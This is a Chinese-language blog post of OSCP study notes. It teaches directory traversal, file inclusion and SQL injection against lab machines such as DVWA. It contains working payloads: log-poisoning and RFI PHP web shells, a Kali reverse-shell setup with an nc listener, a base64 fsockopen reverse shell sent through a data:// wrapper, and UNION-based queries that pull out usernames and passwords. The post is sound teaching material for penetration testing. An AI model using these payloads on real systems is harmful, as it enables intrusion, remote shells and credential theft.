漏洞分析 on 静静的安全笔记

Day27 目录遍历、文件包含与SQL注入漏洞

Tue, 21 Oct 2025 13:57:15 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

目录遍历漏洞（Directory Traversal Vulnerabilities）

目录遍历漏洞，也称为路径遍历漏洞，允许攻击者未经授权访问应用程序内的文件，或访问通常无法通过 Web 接口访问的文件（例如 Web 根目录之外的文件）。当输入验证不当时，就会出现此漏洞，从而使攻击者能够使用"../“或”.."字符来操控文件路径。

这些攻击可能会暴露敏感信息，但==不会在应用程序服务器上执行代码==。在某些用特定编程语言编写的应用程序服务器上，目录遍历攻击可用于帮助促成文件包含攻击。尽管识别这两类漏洞的技术有所重叠，但它们的最终结果不同。

识别和利用目录遍历

搜索目录遍历漏洞始于检查 URL 查询字符串和表单主体，寻找看似文件引用的值，最常见的迹象是 URL 查询字符串中的文件扩展名。

一旦识别出一些可能的候选参数，我们就可以修改这些值，尝试引用系统上任何用户都应可读的文件，例如 Linux 上的 /etc/passwd或 Windows 上的 c:\boot.ini。

让我们回到 Windows 10 实验机上的示例应用程序来演示此漏洞。请确保在继续之前已启动 Apache 和 MySQL。

从主 Web 索引页面，点击"Menu"显示示例菜单：

点击"Menu"链接后，URL 会更新并包含一个名为 file的参数，其值为"current_menu.php"。参数值中出现文件扩展名通常是一个很好的迹象，表明我们应该进一步调查，因为它暗示正在从其他资源包含文本或代码。大多数目录遍历漏洞并不如此明显，但有相当数量的旧版 PHP 应用程序以类似方式加载页面。

在不知道代码具体实现的情况下，我们可以通过更改 file参数的值开始试探。如果我们将"current_menu.php"更改为"old.php"之类的值，我们会得到一个错误而不是菜单：

请注意，错误消息表明服务器未能打开要包含的文件，并返回了完整的文件路径。这表明我们很可能可以通过操纵 file参数来控制页面中呈现的内容。如果我们之前不知道目标是 Windows 主机，这个错误消息也会泄露这一点。它还包含了应用程序的源目录信息。操作系统信息在利用目录遍历漏洞时至关重要。

由于我们知道应用程序运行在 Windows 系统上，让我们更新我们的载荷，以 Windows 的 hosts 文件为目标。在 Windows 系统上，这是一个有用的目标文件，因为它稳定可靠且任何用户都可访问。

让我们将参数值更改为 c:\windows\system32\drivers\etc\hosts并提交 URL：

练习

利用该目录遍历漏洞，读取你的靶机上的任意文件。这里使用dvwa靶场来演示找到?page= 的注入点后就尝试输入 page=../../../../../etc/passwd 就能目录遍历到根目录读取用户配置文件。这里输入多个../ 是为了利用Linux的特性，../ 表示回到上一级目录。因为此时我们不知道这个网页的php在Linux系统中的哪个目录，用多个../ 能确保返回到根目录/ 然后再从根目录访问文件的绝对目录。这个靶场的特性没有过滤/字符，所以直接输入page=/etc/passwd 也是能访问成功的。登录到靶机的docker环境中可以看到etc下面有这些文件（做参考），比较有用的就是passwd, hosts, hostname, shadow 等，这几个文件一般在Linux服务器上都普遍存在，其中要注意的是shadow文件可能因为权限问题无法读取，需要提权后再读。找到dvwa靶场的网页文件，发现除了页面上展示的1，2，3文件，还有一个file4.php 文件在页面上访问可以看到4的内容，提示我们这个就算是找到靶场的隐藏文件了。值得注意的是，靶场对file4.php的内容是直接渲染的，渲染成php文件在页面中。而对其他文件，etc/passwd 和根目录下一个.sh 文件则是直接显示文字内容，没有渲染也没有执行sh的命令。这是因为这个靶场演示的还是文件包含，文件包含与目录遍历的区别就是文件包含能够直接执行或者渲染文件要做的内容，而目录遍历只能看看。通常，如果找到一个目录遍历的洞之后，配合文件上传之类的漏洞上传了一句话木马发现木马执行不成功，或者在蚁剑中怎么也连不上，就要考虑这个注入点只是目录遍历而没有文件包含，文件==只是作为文字内容显示，而不能执行其内容==。此时就要考虑在找找有没有文件包含的洞，让上传的马跑起来。

文件包含漏洞（File Inclusion Vulnerabilities）

与仅显示文件内容的目录遍历不同，文件包含漏洞允许攻击者将文件包含到应用程序的运行代码中。要真正利用文件包含漏洞，我们不仅需要能够执行代码，还必须能够将shell载荷写入某个地方。

本地文件包含(LFI Local File Inclusion) 发生在被包含的文件从同一Web服务器加载时。

远程文件包含(RFI Remote File Inclusion) 发生在从外部源加载文件时。这些漏洞通常出现在PHP应用程序中，但也可能出现在其他编程语言中。

这些漏洞的利用取决于应用程序编写的编程语言和服务器配置。对于PHP来说，语言运行时的版本和Web服务器配置，特别是php.ini中的值(如register_globals和allow_url_wrappers)，对这些漏洞的利用方式有着重大影响。

请注意，目录遍历漏洞通常与LFI结合使用，特别是用于指定LFI载荷中使用的文件。

识别文件包含漏洞

文件包含漏洞的发现方式与目录遍历相同。我们必须找到可以操纵的参数，并尝试使用它们来加载任意文件。然而，文件包含更进一步，我们尝试在应用程序中==执行文件的内容==。

我们还应该检查这些参数是否容易受到远程包含(RFI)的攻击，方法是将它们的值更改为URL而不是本地路径。由于现代PHP版本的默认配置禁用了远程URL包含(这是执行远程代码所需的关键功能)，我们不太可能找到RFI漏洞。然而，我们仍应测试RFI，因为它们通常比LFI更容易利用。

我们可以使用Netcat、Apache或Python来处理请求，就像我们在XSS中所做的那样。我们可能需要尝试在不同端口上托管载荷，因为目标服务器发起的任何远程连接都可能受到内部防火墙或路由规则的限制。可能需要一些试错。

利用本地文件包含(LFI)

一个示例应用程序，我们将从目录遍历攻击中断的地方继续，查看menu.php的源代码以明确我们正在处理的内容：

1<?php
2$file = $_GET["file"];
3include $file; ?>

应用程序从请求查询字符串中读取file参数，然后将该值与include语句一起使用。这意味着应用程序将执行指定文件中的任何PHP代码。如果应用程序使用fread打开文件并使用echo显示内容，文件中的任何代码都将被显示而不是执行。

如果我们能够以某种方式将PHP代码写入本地文件，我们可能能够将此漏洞推进到远程代码执行。由于我们无法将文件上传到服务器，我们有哪些选择？

污染日志文件

我们可以尝试通过日志文件投毒将代码注入服务器。大多数应用服务器会记录所有请求的URL。我们可以利用这一点，提交包含PHP代码的请求。一旦请求被记录，我们就可以在LFI载荷中使用日志文件。

首先，注意整个载荷是用PHP编写的：它以<?php开始，以?>结束。PHP载荷的主体是一个简单的echo命令，它将输出打印到页面。这个输出首先被包裹在<pre> HTML标签中，这些标签保留结果中的任何换行符或格式。接下来是函数调用本身，shell_exec，它将执行操作系统命令。最后，操作系统命令通过_GET['cmd']从GET请求的"cmd"参数中检索。这一行PHP代码将允许我们通过查询字符串指定操作系统命令，并在浏览器中输出结果。

现在让我们发送该载荷：

1kali@kali:~$ nc -nv 10.11.0.22 80
2(UNKNOWN) [10.11.0.22] 80 (http) open
3<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
4HTTP/1.1 400 Bad Request

尽管出现"Bad Request"错误(因为我们没有发出有效的HTTP请求)，我们可以通过检查Windows 10实验机器上的Apache日志文件来验证请求已提交。

我们可以通过打开apache\logs\access.log或使用XAMPP控制面板（Windows）来查看这些日志。

我们的载荷应该在日志文件末尾附近找到：

10.11.0.4 - - [30/Nov/2019:13:55:12 -0500]
"GET /css/bootstrap.min.css HTTP/1.1" 200 155758 "http://10.11.0.22/menu.php?file=\\Windows\\System32\\drivers\\etc\\hosts" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

10.11.0.4 - - [30/Nov/2019:13:58:07 -0500] "GET /tacotruck.php HTTP/1.1" 200 1189 "http://10.11.0.22/menu.php?file=/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

10.11.0.4 - - [30/Nov/2019:14:01:41 -0500] ""<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>\n" 400 981 "-" "-"

由于我们的载荷已被记录，我们可以尝试LFI执行。

LFI代码执行

接下来，我们将使用LFI漏洞来包含包含我们PHP载荷的Apache access.log文件。我们知道应用程序正在使用include语句，因此包含文件的内容将作为PHP代码执行。

我们将构建一个URL，其中包括日志的位置以及要执行的命令(ipconfig)作为cmd参数的值：

http://10.11.0.22/menu.php?file=\path\apache\logs\access.log&cmd=ipconfig

一旦URL发送到Web服务器，输出应该如下所示：

如果一切按预期工作，页面底部应该包括ipconfig的输出。

那么到底发生了什么？由于应用程序的PHP include语句和我们指定要包含哪个文件的能力，被污染的access.log文件的内容被网页执行了。

PHP引擎反过来运行日志文件文本中的<?php echo shell_exec($_GET['cmd']);?>部分(我们的载荷)，cmd变量的值为"ipconfig"，本质上在目标上运行ipconfig并显示输出。日志文件中的其他行只是被显示，因为它们不包含有效的PHP代码。

练习

通过使用LFI攻击获得代码执行
使用代码执行获得完整的shell

日志文件污染的方法，但是这个dvwa没成功，所以这次用靶场的文件上传功能演示LFI。

远程文件包含(RFI)

远程文件包含(RFI)漏洞不如LFI常见，因为服务器必须以非常特定的方式配置，但它们通常更容易利用。例如，PHP应用程序必须将allow_url_include设置为"On"。旧版本的PHP默认开启此选项，但较新版本默认为"Off"。如果我们可以强制Web应用程序加载远程文件并执行代码，我们在创建利用载荷方面就有更多的灵活性。

让我们看一个RFI漏洞的例子。之前演示的LFI漏洞也容易受到RFI攻击。考虑以下情况：

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

这个请求将强制PHP Web服务器尝试从我们的Kali攻击机器包含一个远程文件。我们可以通过在Kali机器上启动netcat监听器来测试这一点，然后在Windows 10目标上提交URL：

1kali@kali:~$ sudo nc -nvlp 80
2listening on [any] 80 ...
3connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 50324
4GET /evil.txt HTTP/1.0
5Host: 10.11.0.4
6Connection: close

输出显示，当提交URL时，Windows 10机器确实连接到我们的Kali机器，试图检索evil.txt文件。如果文件被检索到，它将进一步尝试包含并执行它。

虽然这是一个简单的例子，但URL是有效的，过程是有效的，本质上允许我们加载并执行托管在远程Web服务器上的任何文件。

RFI技巧

空字节绕过：旧版本的PHP存在一个漏洞，其中空字节(%00)将终止任何字符串。这个技巧可用于绕过服务器端添加的文件扩展名，对文件包含很有用，因为它防止文件扩展名被视为字符串的一部分。换句话说，如果应用程序读取参数并向其追加".php"，在参数中传递的空字节有效地结束字符串而不带".php"扩展名。这使攻击者在文件包含漏洞中可以加载的文件方面具有更大的灵活性。 问号技巧：RFI载荷的另一个技巧是以问号(?)结尾，将服务器端添加到URL的任何内容标记为查询字符串的一部分。

要查看实际效果，我们可以设置Apache服务器来托管恶意的evil.txt文件，其中包含我们在日志投毒攻击中使用的相同PHP命令shell。创建文件后，我们将快速重启Apache：

1kali@kali:/var/www/html$ cat evil.txt
2<?php echo shell_exec($_GET['cmd']); ?>
3
4kali@kali:/var/www/html$ sudo systemctl restart apache2

一旦文件就位且我们的Web服务器正在运行，我们可以将RFI攻击URL发送到Windows 10机器上的易受攻击的Web应用程序，看看我们的代码是否执行：

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig

Webshell说明

Webshell是一小段软件，提供基于Web的命令行界面，使执行命令更容易、更方便。webshell有很多类型，Kali在/usr/share/webshells中包含了几个，用多种常见的Web应用程序编程语言编写。与往常一样，在使用这些文件之前请查看其内容。基于这些简单示例的成功，我们可以使用Apache(或其他HTTP服务器)为RFI托管这些shell，扩展我们的能力。

现在我们可以在服务器上执行代码，借助Kali Linux附带的webshell，从代码执行到获得shell应该是一件简单的事情。

练习

利用Web应用程序中的RFI漏洞并获得shell
使用Kali附带的webshell之一在Windows 10目标上获得shell

Kali 自带了一些php反弹的代码，只要使用下面的命令搜索复制到当前文件夹，然后修改ip和端口，在kali上启动一个简单的http服务，确保ip地址可以访问，靶机的all_url_include选项开启，就可以直接访问kali上的php弹回shell了

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.141';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php
3python -m http.server
4rlwrap -cAr nc -nlvp 4777
5# 网页访问
6http://192.168.224.1:8888/vulnerabilities/fi/?page=http://172.168.169.141:8000/php-reverse-shell.php

扩展你的技能库

既然我们已经了解了基础知识，让我们看看扩展技能库的一些方法。

首先，让我们看看一些Apache的替代方案。

Kali包含几个可以创建HTTP服务器的工具。如果我们需要在任意端口上快速建立HTTP服务器，这特别有用。

注意：以下示例使用注册端口，但如果我们以root用户权限运行命令，我们也可以在系统端口上运行服务器。

HTTP服务器替代方案

Python 2.x

例如，我们可以在Python 2.x中在任意端口上启动HTTP服务器，通过设置-m SimpleHTTPServer来设置所需的模块，7331来设置TCP端口：

1kali@kali:~$ python -m SimpleHTTPServer 7331
2Serving HTTP on 0.0.0.0 port 7331 ...

Python 3.x

Python 3.x的语法略有不同，因为模块名称不同：

1kali@kali:~$ python3 -m http.server 7331
2Serving HTTP on 0.0.0.0 port 7331 (http://0.0.0.0:7331/) ...

这两个命令都将启动HTTP服务器，并从当前工作路径托管任何文件或目录。

PHP

PHP包含一个内置的Web服务器，可以使用-S标志后跟要使用的地址和端口来启动：

1kali@kali:~$ php -S 0.0.0.0:8000
2PHP 7.3.8-1 Development Server started at Wed Aug 28 12:59:52 2019
3Listening on http://0.0.0.0:8000
4Document root is /home/kali
5Press Ctrl-C to quit.

Ruby

我们还可以使用Ruby"一行命令"启动HTTP服务器。该命令需要几个标志，包括：

-run：加载un.rb，其中包含常见Unix命令的替代品
-e httpd：运行HTTP服务器
.：从当前目录提供内容
-p 9000：设置TCP端口

1kali@kali:~$ ruby -run -e httpd . -p 9000
2[2019-08-28 12:44:14] INFO WEBrick 1.4.2
3[2019-08-28 12:44:14] INFO ruby 2.5.5 (2019-03-15) [x86_64-linux-gnu]
4[2019-08-28 12:44:14] INFO WEBrick::HTTPServer#start: pid=1367 port=9000

BusyBox

我们还可以使用busybox(“嵌入式Linux的瑞士军刀”)运行HTTP服务器：

httpd：作为函数
-f：交互式运行
-p 10000：在TCP端口10000上运行

1kali@kali:~$ busybox httpd -f -p 10000

要停止任何这些服务器，我们只需按下Ctrl+C。

PHP包装器

PHP提供了几个协议包装器(protocol wrappers)，我们可以使用它们来利用目录遍历和本地文件包含漏洞。这些过滤器在尝试通过LFI漏洞注入PHP代码时为我们提供了额外的灵活性。

我们可以使用data包装器将内联数据嵌入为URL的一部分，使用明文或base64编码的数据。当我们无法用PHP代码污染本地文件时，此包装器为我们提供了替代载荷。

使用Data包装器

让我们仔细看看如何使用data包装器。我们以"data:“开始，后跟数据类型。在这种情况下，我们将使用"text/plain"表示明文。接下来是逗号，标记内容的开始，在本例中是"hello world”。当我们把它们放在一起时，我们得到"data:text/plain,hello world"。

我们已经知道菜单页面容易受到LFI攻击。如果我们使用data包装器提交载荷，应用程序应该将其视为常规文件并将其包含在页面中。让我们通过提交以下URL并检查结果来验证这是否有效：

http://10.11.0.22/menu.php?file=data:text/plain,hello world

正如预期的那样，应用程序将data包装器视为文件并将其包含在页面中，显示我们的"hello world"字符串。

使用Data包装器执行PHP代码

既然明文data包装器有效，让我们看看我们能走多远。我们知道这个页面上存在LFI漏洞，之前的例子证明我们可以使用data包装器注入内容。让我们用一些PHP代码替换"hello world"，看看它是否执行。我们将使用shell_exec运行dir命令，包裹在PHP标签中。那么，URL看起来像这样：

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

我们在data包装器中包含的PHP代码在服务器端执行，生成了目录列表。我们现在可以在不操纵任何本地文件的情况下利用LFI。

练习

使用PHP包装器利用LFI漏洞
使用PHP包装器在Windows 10实验机器上获得shell

 1# 测试命令可用
 2http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20echo%20shell_exec(%22whoami%22)%20?%3E
 3
 4# 检查可用的命令
 5http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20echo%20shell_exec(%22which%20bash%20sh%20python%20perl%20nc%20netcat%22);%20?%3E
 6----
 7/bin/bash /bin/sh /usr/bin/perl
 8
 9# 检查PHP禁用函数 
10http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,<?php echo ini_get("disable_functions"); ?>
11
12# 查看phpinfo
13http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20phpinfo();%20?%3E
14
15# 读取源码
16http://192.168.224.1:8888/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php

方法1 反弹shell

使用更简单但正确的反向Shell 创建简化版（一次性URL）

 1cat > simple_shell.php << 'EOF'
 2<?php
 3$sock=fsockopen("172.168.169.141",4777);
 4$proc=proc_open("/bin/sh",array(0=>$sock,1=>$sock,2=>$sock),$pipes);
 5?>
 6EOF
 7
 8base64 -w 0 simple_shell.php
 9PD9waHAKJHNvY2s9ZnNvY2tvcGVuKCIxNzIuMTY4LjE2OS4xNDEiLDQ3NzcpOwokcHJvYz1wcm9jX29wZW4oIi9iaW4vc2giLGFycmF5KDA9PiRzb2NrLDE9PiRzb2NrLDI9PiRzb2NrKSwkcGlwZXMpOwo/Pgo=
10
11# 网页访问
12http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain;base64,PD9waHAKJHNvY2s9ZnNvY2tvcGVuKCIxNzIuMTY4LjE2OS4xNDEiLDQ3NzcpOwokcHJvYz1wcm9jX29wZW4oIi9iaW4vc2giLGFycmF5KDA9PiRzb2NrLDE9PiRzb2NrLDI9PiRzb2NrKSwkcGlwZXMpOwo/Pgo=

方法2：写入shell后LFI

1# 查看目录
2http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,%3C?php%20system(%22ls%20-la%20/var/www/html/vulnerabilities/fi/%22);%20?%3E
3# 写入shell
4http://192.168.224.1:8888/vulnerabilities/fi/?page=data:text/plain,<?php file_put_contents("shell.php","<?php system(\$_GET['c']); ?>"); ?>
5http://192.168.224.1:8888/vulnerabilities/fi/shell.php?c=id

Sql注入

SQL 注入是一种常见的 Web 应用程序漏洞，它是由于未经过滤的用户输入被插入到查询中，然后传递给数据库执行而造成的。查询用于与数据库交互，例如插入或检索数据。如果我们可以注入恶意输入到查询中，我们就能"突破"开发人员编写的原始查询，并引入我们自己的恶意操作。这类漏洞可能导致数据库信息泄露，根据环境的不同，可能导致服务器完全被攻陷。

在本节中，我们将在 PHP/MariaDB 环境下研究 SQL 注入攻击。虽然不同环境的概念是相同的，但在攻击过程中使用的语法可能需要更新，以适应不同的数据库引擎或脚本语言。

注意： MariaDB 与 MySQL 非常相似。实际上，它起源于 MySQL 的一个分支。虽然存在一些细微差别，但大多数差别对攻击者来说并不重要。

基本 SQL 语法

结构化查询语言（SQL）是用于与关系数据库交互的主要语言。虽然 SQL 有标准语法，但大多数数据库软件包都有实现上的变化。然而，基础语法通常是相同的。让我们先了解一些基本的 SQL 概念和语法，然后再进行漏洞利用。

关系数据库由一个或多个表组成，每个表有一个或多个列。表中的每个条目称为行。

在大多数情况下，我们将处理查询。查询是对数据库引擎的指令，我们使用它们来检索或操作数据库中的数据。SELECT 查询是最基本的交互：

1SELECT * FROM users;

我们可以将列表查询解释为"显示 users 表中的所有列和记录"。SELECT 命令的第一个参数是列，星号是一个特殊字符，表示"所有"。

我们还可以使用 WHERE 子句为查询引入条件子句：

1SELECT user FROM users WHERE user_id=1;

我们可以将查询解释为"显示 users 表中的 user 字段，仅显示 id 为 1 的记录"。

这些只是一些基础知识。我们还可以在表中 INSERT（插入）、UPDATE（更新）和 DELETE（删除）数据。我们在这里不会涵盖这些语句，但在展示如何利用 SQL 注入时，我们会根据需要介绍其他 SQL 语法。

识别 SQL 注入漏洞

在寻找 SQL 注入漏洞之前，我们必须首先识别数据可能通过数据库传递的位置。身份验证通常由数据库支持，根据 Web 应用程序的性质，其他区域（包括电子商务网站上的产品或论坛上的消息线程）通常需要数据库交互。

1http://192.168.224.1:8888/vulnerabilities/sqli/?id=1&Submit=Submit#

我们可以使用单引号（’）作为简单检查潜在 SQL 注入漏洞的方法，SQL 使用单引号作为字符串分隔符。如果应用程序没有正确处理这个字符，很可能会导致数据库错误，并可能表明存在 SQL 注入漏洞。知道了这一点，我们通常通过在每个我们怀疑可能将其参数传递给数据库的字段中输入单引号来开始攻击。在进行黑盒测试时，我们需要使用这种试错方法。

如果我们能够访问应用程序的源代码，我们可以检查它是否存在通过字符串连接构建的 SQL 查询。在 PHP 中，这可能看起来像以下内容：

1$query = "select * from users where id = '$id';"

如果用户数据以任何方式包含在 SQL 语句中而没有经过清理，发生 SQL 注入的可能性非常高。让我们通过一些例子进一步分析。在正常登录中，当提交“1”作为查询的要素时，实际在数据库中执行的代码如下所示：

1$query = "select * from users where id = '1';"

Burp抓包后还可以直接发送到intruder模块配合sql注入字典直接测试。

返回数据比较长的都是注入成功有内容的，可以注入的。

身份验证绕过

身份验证绕过是利用 SQL 注入漏洞的经典示例，展示了恶意用户操纵数据库的危险性。考虑上一节中的代码示例。如果我们能够将自己的代码注入到 SQL 语句中，我们如何能够以有利于我们的方式修改查询？

这是正常的使用场景：合法用户向应用程序提交他们的查询ID，用户名和密码。应用程序使用这些值查询数据库。SQL 语句在 where 子句中使用 and 逻辑运算符。因此，数据库只会返回具有给定用户名和匹配密码的用户记录。

正常的 SQL 查询如下所示：

1select * from users where id = '1';

如果我们控制作为 $id 传入的值，我们可以通过提交 1' or 1=1;# 作为我们的用户名来破坏查询的逻辑，这将创建如下查询：

1select * from users where id = '1' or 1=1;#';

井号字符（#）是 MySQL/MariaDB 中的注释标记。它有效地删除了语句的其余部分，所以我们剩下：

1select * from users where id = '1' or 1=1;

SQL中单引号和井号可以作为注释和分段，所以如果输入万能密码 1 ’ or 1=1;# 的话。

可以看到 1‘ 和原本查询语句开头的 id = ’ 组成了一个完整的语句，而此时又带入了or 后面的内容，为了不让原本的结尾的 ‘;中的引号引起语法错误，使用了#注释掉后面的内容，所以# 号后面被SQL数据库视为注释内容没有执行，所以结尾的引号不会引起报错，而我们又成功执行了 or 1=1;的内容。

我们可以将其解释为"显示id为 1 或 1 等于 1 的用户的所有列和行"。由于"1=1"条件始终评估为真，因此将返回所有行。简而言之，通过引入 or 子句和"1=1"条件，该语句将返回 users 表中的所有记录，创建一个有效的"密码检查"。

这足以绕过身份验证吗？这取决于情况。我们已经操纵查询返回 users 表中的所有记录。应用程序代码决定接下来会发生什么。某些编程语言具有查询数据库并期望单个记录的函数。如果这些函数获得多行，它们将生成错误。其他函数可能可以很好地处理多行。在没有应用程序源代码或使用试错法的情况下，我们无法知道会发生什么。

如果当我们的 payload 返回多行时遇到错误，我们可以使用 LIMIT 语句指示查询返回固定数量的记录：

1select * from users where id = '1' or 1=1 LIMIT 1;#

为了试验这些查询及其对数据库的影响，我们可以使用 MySQL 用户名和密码直接连接到靶机的数据库，并直接执行 SQL 语句：

假如是在登录界面，而我们不知道密码的情况下，可以用这个万能密码和LIMIT语法只返回第一个用户（一般就是admin管理员）的用户名和密码，通过包含"or 1=1 LIMIT 1;“子句并注释掉查询的其余部分来欺骗应用程序让我们进入。我们不确切知道查询的样子，但"or"子句将评估为真，因此会导致查询返回记录。我们将包含"LIMIT"子句以保持简单并仅返回一条记录。我们将在"username"字段中提交我们的 payload，如果我们成功操纵了查询，我们应该获得一个有效的已认证会话。

如何防止 SQL 注入？ 一个天真的方法可能是在清理用户输入时删除所有单引号字符。然而，有时单引号应该被视为有效输入，例如姓氏。最好的方法是使用参数化查询，也称为预处理语句（prepared statements）。此功能允许开发人员在其 SQL 语句中放置参数或占位符。然后将用户输入与语句一起提供，数据库将值绑定到语句，在 SQL 语句代码和数据值之间创建一个分离层。这可以防止用户提供的数据操纵 SQL 代码。大多数主要数据库系统和编程语言都支持预处理语句。

📝 注意

下面的内容只作为理论查看，教材部分命令不再适用新的环境。推荐看专题[[sqli-labs 靶场合集 WP|sqli-labs]] 练习，搞懂所有的SQL操作。

枚举数据库

我们还可以使用 SQL 注入攻击来枚举数据库。当我们开始构建更复杂的 SQL 注入 payload 时，我们需要这些信息。例如，如果我们要从列和表中提取数据，我们需要知道列名和表名。这有助于我们执行更精确的数据提取。

这会导致 SQL 语法错误，表明存在潜在的 SQL 注入漏洞。

列数枚举

我们可以向查询添加 order by 子句进行简单枚举。此子句告诉数据库按一列或多列中的值对查询结果进行排序。我们可以在查询中使用列名或列索引。

让我们提交以下 URL：

http://10.11.0.22/debug.php?id=1 order by 1

此查询指示数据库根据第一列中的值对结果进行排序。如果查询中至少有一列，则查询有效，页面将正常呈现而不会出错。我们可以提交多个查询，每次递增 order by 子句，直到查询生成错误，表明已超过相关查询返回的最大列数。请记住，查询可以选择表中的所有列或仅选择列的子集。如果我们无法访问源查询，则需要依赖这种试错方法。

由于我们需要任意次数地迭代列号，我们应该使用 Burp Suite 的 Repeater 工具自动化查询。

为此，我们必须首先启动 Burp Suite，关闭 Intercept 并针对我们的 Windows 目标启动 URL。在 Proxy > HTTP history 中，我们应该看到我们想要重复的请求：

接下来，我们将右键单击该请求并选择 Send to Repeater。该请求现在应该显示在 Repeater 选项卡下。

请注意，该请求已进行 URL 编码，并显示为"id=1%20order%20by%201”。这不应影响我们的查询。我们可以点击 Send 提交查询：

响应看起来正常。我们可以使用 Response 窗格下的搜索框搜索"Error"，并验证响应主体中没有匹配项。

接下来，我们可以递增 order_by 子句并再次发送查询，直到收到错误消息。我们可以使用 Response 窗格下的搜索框在响应中突出显示错误：

order by 子句在第三次迭代时产生错误，我们知道查询返回包含2列的结果集。这和数据库中原本的数据8列不一样，因为网页上只选取了Firstname 和 Surname两列的数据。

理解输出的布局

现在我们知道表中有多少列，我们可以使用此信息通过 UNION 语句提取更多数据。UNION 允许我们向原始查询添加第二个 select 语句，扩展我们的能力，但每个 select 语句必须返回相同数量的列。

根据我们的枚举，我们知道查询选择了2列。但是，网页上只显示两列。我们的下一步是确定显示哪些列。如果我们使用 union 来提取有用的数据，我们希望确保数据将被显示。

我们需要更好地理解我们的输出，以便开始构建有意义的数据库提取。首先，让我们了解一下页面中显示了哪些列。我们将使用 UNION 来做到这一点。我们可以指定字面值，而不是从表中查找值。由于我们有三列，我们将在 payload 中添加"union all select 1, 2"。这个新的 select 语句将返回一行，包含三列，值为 1、2 。我们的 payload 现在是：

http://192.168.224.1:8888/vulnerabilities/sqli/?id=1+union+all+select+1%2C+2&Submit=Submit#

页面显示不同列的位置，如下所示：

我们可以看到第一列未显示，第二列显示在 name 字段中，第三列显示在 Comment 字段中。Comment 字段有更多空间，因此这是我们未来漏洞利用输出的合理位置。

提示： 如果对此有任何不清楚的地方，现在是再次直接连接到数据库并尝试这些查询的好时机。您不需要成为经验丰富的数据库管理员就能利用 SQL 注入，但您对 SQL 和这些查询正在做什么越熟悉，从 SQL 错误消息到成功利用 SQL 注入漏洞就越容易。

从数据库中提取数据

我们现在可以开始从数据库中提取信息。以下示例使用特定于 MariaDB 的命令。但是，大多数其他数据库提供类似的功能，语法略有不同。无论我们针对什么数据库软件，最好了解特定于平台的命令。

例如，要输出 MariaDB 的版本，我们可以使用此 URL：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, @@version

这应该在 name 字段中输出"2"，在 comment 字段中输出数据库版本号：

很好。看起来正在工作。接下来，让我们使用此查询输出当前数据库用户：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, user()

此查询显示正在使用 root 用户进行数据库查询：

information_schema 存储有关数据库的信息，如表名和列名。我们可以使用它来获取数据库的布局，以便我们可以制作更好的 payload 来提取敏感数据。查询如下所示：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, table_name from information_schema.tables

这应该输出大量数据，其中大部分引用有关 MariaDB 中默认对象的信息。它还将包括表名，但我们需要滚动浏览输出以找到它们。

users 表看起来特别有趣。让我们针对该表并使用以下查询检索列名：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

这会输出 users 表的所有列名：

我们知道原始查询选择三列，网页显示第二列和第三列。如果我们更新 union payload，我们可以在第二列中显示用户名，在第三列中显示密码。

http://10.11.0.22/debug.php?id=1 union all select 1, username, password from users

这将在 name 字段中输出数据库用户名，在 comments 字段中输出密码：

太好了。我们不仅获得了用户名和密码，而且密码都是明文的。我们可以通过登录管理页面来验证这些信息。

我们可以查看源代码来验证我们通过黑盒测试推断出的内容：

 136 <?php
 237 include "database.php";
 338 if (isset($_GET['id'])) {
 439 $sql = "SELECT id, name, text FROM feedback WHERE id=". $_GET['id'];
 540 $result = $conn->query($sql);
 641 if (!$result) {
 742 trigger_error('An error occured: ' . $conn->error);
 843 } else if ($result->num_rows > 0) {
 944 while($row = $result->fetch_assoc()) {
1045 echo "<tr><td> " . $row["name"]. "</td><td>" . $row["text"]. "</td></tr>";
1146 }
1247 } else { echo "No results. Specify an id."; }
1348 } else {
1449 echo "No results. Specify an id in your URL like ?id=1.";
1550 }
1651 ?>

导致 SQL 注入的易受攻击代码在列表 332 的第 39 行。注入点位于查询末尾的"WHERE"子句中，这使得使用"UNION" payload 变得容易。查询的结果被获取，然后在第 45 行写出以供显示。请注意，虽然查询中包含三列，但只显示其中两列。这就是为什么我们使用第二列和第三列从另一个表中提取数据。

练习

使用 SQL 注入枚举数据库的结构。
理解如何以及为什么可以从注入的命令中提取数据并将其显示在屏幕上。
从数据库中提取所有用户和相关密码。

从 SQL 注入到代码执行

让我们看看能将这个漏洞推进到什么程度。根据操作系统、服务权限和文件系统权限，SQL 注入漏洞可用于读取和写入底层操作系统上的文件。将包含 PHP 代码的精心制作的文件写入 Web 服务器的根目录，然后可以利用它来实现完整的代码执行。

首先，让我们看看是否可以使用 load_file 函数读取文件：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

这应该输出 hosts 文件的内容：

